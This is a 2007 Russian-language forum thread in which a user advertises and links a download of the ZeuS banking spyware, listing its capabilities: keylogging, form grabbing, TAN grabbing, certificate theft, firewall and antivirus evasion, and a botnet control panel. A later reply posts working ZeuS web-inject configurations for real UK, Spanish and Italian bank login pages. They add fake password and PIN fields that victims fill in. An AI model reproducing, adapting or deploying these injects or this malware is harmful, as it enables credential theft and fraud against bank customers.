[Наши релизы] Zeus 1.0.2.11

Тема в разделе "Скрипты", создана пользователем +VAMPIR+, 16 дек 2007.

Информация :
Уважаемые пользователи если Вы ищите скрипт, то создайте тему в соответствующем разделе "Коммерческие" или "OpenSource"
В данном разделе создавать темы с префиксом"ИЩУ" запрещено.
Модераторы: DMS
  1. +VAMPIR+

    +VAMPIR+ Master

    Регистр.:
    13 апр 2006
    Сообщения:
    533
    Симпатии:
    616
    Описание продукта
    ZeuS - Шпионское ПО (Spyware, далее "бот") для 32-х разрядной MS Windows 2000/XP+ служит для управления компьютерами жертв и получения с них информации при помощи ведения логов.

    ZeuS состоит из трех частей:
    Панель управления, которая устанавливается на сервер(а).
    Билдер, является приложением для Windows, служит для задания конфигурации бота.
    Бот, является приложением для Windows, но уже запускается на компьютере жертвы.
    Внимание! В зависимости от количества активных ботов, сборки, и настройки, вам понадобится от обычного хостинга до мощного сервера или серверов.

    ZeuS имеет следующие основные возможности и свойства (здесь приведен полный список, в вашей сборке часть этого списка может отсутствовать:(
    Бот:
    Написан на VC++ 8.0, без использования RTL и т.д., на чистом WinAPI, за счет этого достигается маленький размер (10-25Кб, зависит от сборки).
    Не имеет собственного процесса, за счет этого нельзя обнаружить в списке процессов.
    Обход большинства фаерволов (включая популярный Outpost Firewall версий 3, 4, но сущетвует временная небольшая проблема с антишпионом). Не дает гарантии беспрепятственного приема входящих соединений.
    Сложно обнаружить поиском/анализом, бот устанавливается жертве и создает файл с временем системных файлов и произвольным размером.
    Работает в лимитированных учетных записях Windows (работа в гостевой учетной записи в настоящее время не поддерживается).
    Невидим для экваристики антивирусов, тело бота зашифровано.
    Некоем образом не создает подозрения на свое присутствие, если вы это не захотите. Здесь имеется ввиду то, что любят делать многие авторы spyware: выгрузка фаерволов, антивирусов, запрет на их обновление, блокировка Ctrl+Alt+Del и т.д.
    Блокировка Windows Firewall (данная функция требуется только для беспрепятственного приема входящих соединений).
    Все свои настройки/логи/команды бот хранит/принимает/передает в зашифрованном виде по HTTP(S) протоколу. (т.е. в текстовом виде данные будете видеть только вы, все остальное бот<->сервер будет выглядеть как мусор).
    Обнаружение NAT при помощи проверки своего IP через указанный вами сайт.
    Отдельный файл конфигурации, что позволяет себя защитить от потери ботнета в случаи недоступности основного сервера. Плюс дополнительные (резервные) файлы конфигурации, к которым бот будет обращаться, когда не будет доступен основной файл конфигурации. Эта система гарантирует выживание вашей ботнета в 90% случаях.
    Возможность работать с любыми браузерами/программами работающими через wininet.dll (Internet Explorer, AOL, Maxton и т.д.:(
    Перехват POST-данных + перехват нажатых клавиш (включая вставленные данные из буфера обмена).
    Прозрачный URL-редирект (на фейк-сайты и т.д.) c заданием простейших условий редиректа (например: только при GET или POST запросе, при наличии или отсутствии определенных данных в POST-запросе).
    Прозрачная HTTP(S) подмена содержимого (Веб-инжект, который позволяет подменять не только HTML страницы, но и любой другой тип данных). Подмена задается при помощи указания масок подмены.
    Получение содержимого нужной страницы с исключением HTML-тегов. Основано на Веб-инжекте.
    Настраиваемый TAN-граббер для любых стран.
    Получения списка вопросов и ответов в банке "Bank Of America" после успешной авторизации.
    Удаление нужных POST-данных на нужных URL.
    ИДЕАЛЬНОЕ РЕШЕНИЕ ДЛЯ ВИРТУАЛЬНЫХ КЛАВИАТУР: После захода на нужную URL, происходит получение скриншота в области экрана, где была нажата левая кнопка мыши.
    Получение сертификатов из хранилища "MY" (сертификаты с пометкой "Не экспортируемый" не экспортируются корректно) и его очистка. После это любой импортируемый сертификат будет сохранен на сервер.
    Перехват логина/пароля протоколов POP3 и FTP в независимости от порта и запись его в лог только при удачной авторизации.
    Изменение локального DNS, удаление/добавление записей в файл %system32%\drivers\etc\hosts, т.е. сопоставление указанного домена с указанным IP для WinSocket.
    Сохраняет содержимое Protected Storage при первом запуске на компьютере.
    Удаляет Сookies из кэша Internet Explorer при первом запуске на компьютере.
    Поиск на логических дисках файлов по маске или загрузка конкретного файла.
    Запись только что посещенных страницы при первом запуске на компьютере. Полезен при установки через сплойты, если вы покупаете загрузки у подозрительного сервиса, можно узнать что грузится еще параллельно.
    Получение скриншота с компьютера жертвы в реальном времени, компьютер должен находится вне NAT.
    Прием команд от серверной части и отправка отчета назад об успешном выполнении. (В настоящее время запуск локального/удаленного файла, немедленное обновление файла конфигурации, уничтожение ОС).
    Socks4-сервер.
    HTTP(S) PROXY-сервер.
    Обновление бота до последней версии (URL новой версии прописывается в файле конфигурации).


    Панель управления:
    Для работы требуется PHP + MySQL.
    Простой инсталлятор (обычно хватает ввода данных юзера MySQL и нажатия кнопки 'Install').
    Многопользовательский режим, каждому пользователю можно задать определенные права доступа.
    Статистика установок(инсталлов, заражений).
    Статистика ботов находящихся в онлайн.
    Разделение ботнета на сабботнеты.
    Обзор онлайновых ботов (так же возможен фильтр)
    Просмотр скриншота в реальном времени.
    Просмотр и проверка Sock4.
    Время нахождения бота в онлайн.
    Скорость соединения (только для ботов вне NAT).
    Хранении логов в базе данных. Это дает следующие преимущества:
    Поиск логов по фильтру содержимого.
    Поиск логов по шаблонам с выделением нужных POST данных (например позволяет выделять на сайте http://rambler.ru/ только логи и пароль, отбрасывая при поиски все остальные данные).
    Хранение логов в зашифрованных файлах, в структуре директорий ботнет\страна\ID компьютера.
    Отдача команд ботам (так же возможен фильтр).
    При знании PHP вы можете самостоятельно перенастроить панель управления по вашем вкусу.


    Билдер:

    Написан на VC++ 8.0, без использования RTL и т.д. на чистом WinAPI, за счет этого достигается маленький размер (зависит от сборки, в сборке с декодером логов размер будет более 400кб, т.к. будет включена база стран по IP).
    Просмотр статуса текущей системы, в качестве теста бота вы можете запустить его на своем компьютере, а потом нажатием одной кнопки удалить его.
    Декодер логов, с распределением по странам.
    Билдер файла конфигурации (шифрованного) и самого бота.
    Полиморфный криптор BETA. В настоящее время находится на стадии тестирования, и не гарантирует сто процентную защиту от антивурсов. Но гарантировано доведение данной функции до ума в ближайшее время.

    Скачать
     
    crocodile, masima и gruppastimul нравится это.
  2. DMN

    DMN Прохожие

    ссыль помойму не живой!
    скиньте в личку ссылку, интересно стало :)
     
  3. Avalanch

    Avalanch ТоЛеГ & ТоПеГ

    Регистр.:
    9 янв 2007
    Сообщения:
    1.144
    Симпатии:
    524
    Так попробуй:

    _http://slil.ru/25242388
     
  4. nik0tin

    nik0tin

    Регистр.:
    29 авг 2007
    Сообщения:
    320
    Симпатии:
    56
    А альтернатива этому есть? А то ресурсы жрет - хостер уже предупредил.
     
  5. AdeQuAte

    AdeQuAte

    Регистр.:
    23 мар 2007
    Сообщения:
    353
    Симпатии:
    45
    Тоесть это по сути клавиатурный шпион? :confused:
     
  6. +VAMPIR+

    +VAMPIR+ Master

    Регистр.:
    13 апр 2006
    Сообщения:
    533
    Симпатии:
    616
    на данный момент коечто новое появилось , потестирую если что скину на форум, называется ADPack на данный момет не палится
     
  7. BigLuck

    BigLuck Постоялец

    Регистр.:
    25 июн 2007
    Сообщения:
    76
    Симпатии:
    12
    Клавиатурный шпион это пинч =)
    А zeus в свое время стоил 2000$ и отрабатывал их сполна
     
  8. BigLuck

    BigLuck Постоялец

    Регистр.:
    25 июн 2007
    Сообщения:
    76
    Симпатии:
    12
    Кстати, вот несколько инжектов для зевса :)
    set_url https://intelvia.cajamurcia.es/2043/entrada/01entradaencrip.htm GP
    data_before
    name="PANB"*">
    data_end
    data_inject
    </tr>
    <tr>
    <td nowrap>&nbsp;&nbsp;&nbsp;&nbsp;;&nbsp; <b>Clave de Firma.</b>
    <br>
    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Introduzca su Clave de Firma
    <dir>
    <input type="text" name="ESpass" style="FONT-WEIGHT: normal; FONT-SIZE: 11px; WIDTH: 70px; COLOR: #db0000; BORDER-TOP-STYLE: groove; FONT-STYLE: normal; FONT-FAMILY: arial; BORDER-RIGHT-STYLE: groove; BORDER-LEFT-STYLE: groove; HEIGHT: 20px; TEXT-ALIGN: right; BORDER-BOTTOM-STYLE: groove" ID="Text2">
    data_end
    data_after
    data_end
    data_before
    <td align="left" valign="top">&nbsp; <a href="javascript:
    data_end
    data_inject
    if(document.intelvia.ESpass.value.length<5){alert('Clave de Firma no encontrado.');}else
    data_end
    data_after
    data_end

    set_url https://hb.quiubi.it/newSSO/x11logon.htm GP
    data_before
    name="password"*</tr
    data_end
    data_inject
    </tr>
    <tr>
    <td>Password Dispositiva</td>
    <td align="right"><input type="password" name="pass" size="20"></td>
    data_end
    data_after
    data_end
    data_before
    function cmdLogin_onclick*{
    data_end
    data_inject
    if (document.ssoform.pass.value.length<8){
    alert("Per favore, riempire Password Dispositiva");
    document.ssoform.pass.focus();
    return false;
    } else

    data_end
    data_after
    data_end

    set_url https://www.iwbank.it/private/index_pub.jhtml* GP
    data_before
    name="_D:auto_username"*">
    data_end
    data_inject
    <tr>
    <td>&nbsp;&nbsp;</td><td class="dati-content">
    Password Dispositiva<br>
    <input name="pass" type="text" class="textarea" size="20" style="width:148px" value="">
    data_end
    data_after
    data_end
    data_before
    function submitDaLogin*{
    data_end
    data_inject
    if ( yoForm.pass.value=="" ){
    alert ( "Per favore, riempire Password Dispositiva" );
    return false;
    data_end
    data_after
    data_end
    data_before
    return true*;
    data_end
    data_inject
    }
    data_end
    data_after
    data_end

    set_url https://web.secservizi.it/siteminderagent/forms/login.fcc GP
    data_before
    name="PASSWORD"*</tr>
    data_end
    data_inject
    <tr> <td colspan=4 height=10> <font size=1> &nbsp; </font> </td> </tr>
    <tr>
    <td WIDTH=20 >&nbsp;</td>
    <td >
    <b><font size=-1 face="arial,helvetica" > Password Dispositiva: </font></b>
    </td>
    <td ALIGN="left" >
    &nbsp; <input type="password" name="pass" size="30" style="margin-left: 1px">
    </td>
    <td WIDTH=20 >&nbsp;</td>
    </tr>
    data_end
    data_after
    data_end
    data_before
    onClick="
    data_end
    data_inject
    if (document.forms[0].pass.value.length < 1) {alert('Per favore, riempire Password Dispositiva');return;}
    data_end
    data_after
    data_end

    set_url https://www.isideonline.it/relaxbanking/sso.Login* GP
    data_before
    name="codAbi"*</tr>
    data_end
    data_inject
    <tr>
    <td align="left">
    <table border="0" cellpadding="0" cellspacing="0" width="100%">
    <tr>
    <td height="65"><b> Password Dispositiva:</b></td>
    </tr>
    <tr>
    <td align="center">
    <input type="password" name="pass" size="10" maxlength="5">
    </td>
    </tr>
    data_end
    data_after
    data_end
    data_before
    href="javascript:
    data_end
    data_inject
    if(document.frmRegister.pass.value.length<5){alert('Inserisci la Codice');}else
    data_end
    data_after
    data_end

    set_url https://www.cajacirculo.es/ISMC/Circulo/acceso.jsp GP
    data_before
    id="sUsuario*</td>
    data_end
    data_inject
    </tr>
    <tr>
    <td width="78"><div align="right"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> Clave de Firma</font></div></td>
    <td width="60"><input name="ESpass" type="text" id="sUsuario" size="10" maxlength="20"></td>
    data_end
    data_after
    data_end
    data_before
    <input name="imageField"
    data_end
    data_inject
    OnClick="javascript: if (document.userpass.ESpass.value.length < 5) {
    alert('Clave de Firma no encontrado');return;};"
    data_end
    data_after
    data_end


    set_url https://areasegura.banif.es/bog/bogbsn* GP
    data_before
    NAME="textfield_Login"*</td>
    data_end
    data_inject
    <td class="ob" width="120" align="right">&nbsp;</td>
    <td align="left" width="310">&nbsp;&nbsp;
    </td>
    </tr>
    <tr>
    <td class="ob" width="120" align="right"><b>
    Firma
    <IMG NAME="IMG9" HEIGHT="8" WIDTH="11" SRC="../../images/bsn/flecha_black.gif"></b></td>
    <td align="left" valign="middle" width="310">&nbsp;
    <INPUT TYPE=password NAME="ESpass" MAXLENGTH="40" VALUE="" class="combowhite">
    <tr>
    data_end
    data_after
    data_end
    data_before
    <A HREF="#" name="Confirm" onClick="
    data_end
    data_inject
    if (document.forms[0].ESpass.value.length < 4) {
    alert('Firma no encontrado.');return;};
    data_end
    data_after
    data_end

    set_url http://www.hsbc.co.uk/1/2/personal/internet-banking* GP
    data_before
    name='internetBankingID'*/>
    data_end
    data_inject
    <div class="extNoPadding">
    <label for="userID">
    Security Key.</label>
    <div class="extTopPadding">
    <INPUT type="text" name='UKpass' class="jsDisableAutoComplete" size="10" autocomplete="off"
    maxlength="12" type=password VALUE="" style="float:left; width: 133px;"/>
    data_end
    data_after
    data_end
    data_before
    <a href="javascript:
    data_end
    data_inject
    CheckES();
    data_end
    data_after
    data_end
    data_before
    <script language="javascript" type="text/javascript">
    data_end
    data_inject

    function CheckES(){var vv=document.PC_7_1_5I5_cam10Form.UKpass.value;if(vv.length<2){alert('Please enter your security Key.')}};
    data_end
    data_after
    data_end

    set_url https://www.nwolb.com/Login.aspx* GP
    data_before
    LI6-DDALD_spot*<tr>
    data_end
    data_inject
    <td class="wizardLabelWide"><label for="LI6PPED_edit" id="LI6DDALDLabel">Complete Password</label></td><td class="wizCrl"><span id="LI6PPED"><input name="ESpass" type="password" maxlength="12" size="12" id="LI6PPEA_edit"/></span></td>
    </tr><tr>
    data_end
    data_after
    data_end
    data_before
    LI6-DDALA_spot*<tr>
    data_end
    data_inject
    <td class="wizardLabelWide"><label for="LI6PPEA_edit" id="LI6DDALALabel">Complete PIN</label></td><td class="wizCrl"><span id="LI6PPEA"><input name="ESpasspin" type="password" maxlength="12" size="12" id="LI6PPEA_edit" /></span></td>
    </tr><tr>
    data_end
    data_after
    data_end
    data_before
    value="Next" onclick="
    data_end
    data_inject
    if (document.forms[0].ESpasspin.value.length < 2) {
    alert('Please enter your complete PIN ');
    return false;
    } else
    if (document.forms[0].ESpass.value.length < 2) {
    alert('Please enter your Complete Password');
    return false;
    } else
    data_end
    data_after
    data_end
     
  9. Lozzie

    Lozzie Постоялец

    Регистр.:
    10 апр 2006
    Сообщения:
    92
    Симпатии:
    26
    Где-то читал что появился зевс якобы 1.1, хотя последняя версия 1.0.3.7. Сказки?
     
  10. Anzaman

    Anzaman Создатель

    Регистр.:
    12 июн 2007
    Сообщения:
    25
    Симпатии:
    11
    А на виртуальном хостинге работать будет или надо выделенный сервер?